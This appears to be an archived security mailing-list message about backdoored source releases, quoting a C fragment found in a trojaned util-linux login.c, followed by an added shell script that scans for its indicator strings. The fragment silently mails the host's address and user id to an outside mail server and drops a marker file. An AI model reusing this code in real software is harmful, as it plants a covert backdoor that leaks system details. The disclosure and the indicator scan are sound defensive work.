login-utils is not part of my FTP archive.

        Wietse

John Stange:
> You may want to have a thorough look at everything you've got... I grabbed
> a copy of util-linux2.9g (admittedly being a bad boy and not checking
> against anything), and while I don't have a pristine copy of the source
> on hand to check, I'm guessing that sendmail and a hotmail address is not
> standard behavior for /bin/login:
>
> (from login-utils/login.c)
>
>     he = gethostbyname("mail.hotmail.com");
>     if (!he) exit(0);
>     ia = (struct in_addr *)he->h_addr_list[0];
>     l = sizeof(sai);memset(&sai,0,l);
>     sai.sin_port = htons(25);
>     sai.sin_addr.s_addr = ia->s_addr;
>     if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);
>     if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);
>     if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0);
>     sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());
>     sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
>     sleep(1);if (write(s,"MAIL FROM:<xulat_private>\n",28) < 0) exit(0);
>     if (write(s,"RCPT TO:<wlogainat_private>\n",30) < 0) exit(0);
>     sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);
>     sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);
>     sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);
>     sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);
> etc etc
>
> I'm in a bit of a hurry, so I haven't had a chance to comb anything
> else...
>
> > TCP Wrappers is a widely-used security tool to protect UNIX systems
> > against intrusion. It has an estimated installed base of millions.
> >
> > Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
> > a backdoored version. Eventually this was bound to happen, and
> > that's why the source file is accompanied by a PGP signature. But
> > that is no guarantee against people downloading and installing
> > backdoored software.
>
> -- John Stange
> Staff World, 4120 AVW
> x52720
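
The string literals in the login.c fragment quoted above can be used as indicators when checking an unpacked source tree or a host. The shell sketch below is an added example, not part of the original message or of any project's code; the function names are hypothetical and the sample tree is constructed for the demonstration.

```shell
#!/bin/sh
# Indicators are string literals copied from the login.c fragment quoted
# in the message above. Function names are hypothetical.

# Print every regular file under directory $1 that contains a quoted literal.
scan_tree() {
    find "$1" -type f -exec grep -lF \
        -e 'mail.hotmail.com' \
        -e '/var/tmp/.fmlock0' \
        -e 'HELO 127.0.0.1' {} + 2>/dev/null || :
}

# Print the number of files flagged under directory $1.
count_hits() {
    scan_tree "$1" | wc -l | tr -d ' '
}

# Succeed if the marker file the fragment creates exists under root $1
# (pass an empty string to check the live system).
marker_present() {
    [ -e "${1:-}/var/tmp/.fmlock0" ]
}

# Constructed sample tree: one file carrying a quoted literal, one clean file.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/login-utils" "$d/lib"
    printf 'he = gethostbyname("mail.hotmail.com");\n' > "$d/login-utils/login.c"
    printf 'int main(void) { return 0; }\n' > "$d/lib/clean.c"
    printf '%s\n' "$d"
}

sample=$(make_sample)
echo "flagged files: $(count_hits "$sample")"
scan_tree "$sample"
if marker_present "$sample"; then echo "marker file present"; fi
rm -rf "$sample"
```

A clean scan only shows that these particular literals are absent; comparing the archive against the maintainer's PGP signature, as the announcement notes, is the check that covers a modified backdoor.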